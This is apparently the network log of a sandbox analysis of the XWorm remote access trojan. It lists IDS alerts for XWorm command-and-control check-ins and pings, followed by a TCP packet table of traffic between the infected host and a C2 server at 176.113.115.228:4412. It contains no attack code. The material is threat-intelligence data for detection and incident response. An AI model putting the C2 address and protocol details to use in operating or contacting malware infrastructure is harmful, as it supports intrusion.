                                        2025-01-26T10:35:04.163753+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:04.166179+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:06.917867+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:15.963703+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:15.967787+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:25.653662+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:25.655476+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:25.854717+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:25.864086+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:26.619507+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:26.643517+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:31.488042+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:31.490610+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:31.901153+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:31.946435+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:36.906588+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:41.125293+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:41.127120+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:52.921008+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:52.923666+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:35:56.558294+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:35:56.564382+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:03.438235+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:03.442442+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:03.562563+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:03.564213+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:03.688443+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:03.689951+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:03.811883+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:03.820321+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:03.934237+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:03.942247+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:06.915056+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:08.851433+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:08.857621+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:08.974394+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:08.976077+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:09.104641+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:09.106351+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:09.576639+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:09.578400+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:22.254524+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:22.255919+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:22.256062+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:22.256207+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:22.257763+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:22.472568+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:22.474521+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:24.180863+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:24.397558+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:24.399249+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:34.555246+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:34.559337+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:35.219704+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:35.221750+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:36.902304+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:47.007422+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:47.011390+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:36:58.808052+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:36:58.809874+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:37:04.368257+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:04.373284+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:37:06.917682+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:07.432087+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:07.434211+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:37:11.273258+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:11.275725+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:37:23.070700+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:23.204297+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:37:31.646275+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:31.648147+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:37:31.767760+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:31.769145+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        2025-01-26T10:37:36.936336+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:43.523152+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP
                                        2025-01-26T10:37:43.537690+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jan 26, 2025 10:34:16.473707914 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:16.478557110 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:16.478660107 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:16.746017933 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:16.750857115 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:28.544275999 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:28.549175978 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:28.769948006 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:28.814225912 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:28.819127083 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:36.918087959 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:36.961432934 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:40.337477922 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:40.342442036 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:40.555435896 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:40.558655024 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:40.563498974 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:52.133903980 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:52.138974905 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:52.350845098 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:34:52.357325077 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:34:52.362904072 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:03.930773973 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:03.937963009 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:04.163753033 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:04.166178942 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:04.171386003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:06.917866945 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:06.961540937 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:15.727806091 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:15.732698917 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:15.963702917 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:15.967787027 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:15.972578049 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:25.430901051 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:25.435942888 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:25.633748055 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:25.638618946 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:25.653661966 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:25.655476093 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:25.706727028 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:25.854717016 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:25.864085913 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:25.868936062 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:26.383768082 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:26.388530970 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:26.619507074 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:26.643517017 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:26.648304939 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:31.258878946 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:31.263725042 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:31.488042116 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:31.490609884 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:31.495409012 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:31.508718014 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228
                                        Jan 26, 2025 10:35:31.513504982 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5
                                        Jan 26, 2025 10:35:31.901153088 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:31.946434975 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:31.951338053 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:36.906588078 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:36.961664915 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:40.899533987 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:40.904432058 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:41.125293016 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:41.127120018 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:41.133542061 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:52.698976040 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:52.704044104 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:52.921008110 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:52.923666000 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:52.928633928 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:56.337096930 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:56.342314959 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:56.558294058 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:56.564382076 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:56.569220066 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.212090015 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.217067003 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.321516991 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.326473951 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.352952003 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.357848883 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.415560007 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.420509100 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.438235044 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.442441940 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.490748882 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.524586916 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.529503107 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.562562943 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.564213037 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.610682011 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.688442945 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.689950943 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.694849968 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.811882973 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.820321083 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.825231075 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.934237003 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.942246914 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.947299004 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:06.915055990 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:06.961744070 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.633966923 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.639168978 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.711914062 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.716850042 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.851433039 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.852612019 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.857564926 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.857620955 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.862437963 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.974394083 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.976077080 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.980982065 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.104640961 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.106350899 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:09.111181021 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.290158033 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:09.295129061 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.576638937 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.578399897 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:09.583355904 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:21.087090015 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:21.092170954 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.245496988 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.254523993 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.255918980 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.256062031 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.256144047 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.256145000 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.256206989 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.256365061 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.257608891 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.257762909 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.262571096 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.472568035 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.474520922 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.481369019 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:24.180862904 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:24.186090946 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:24.397557974 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:24.399249077 CET497094412192.168.2.5176.113.115.228
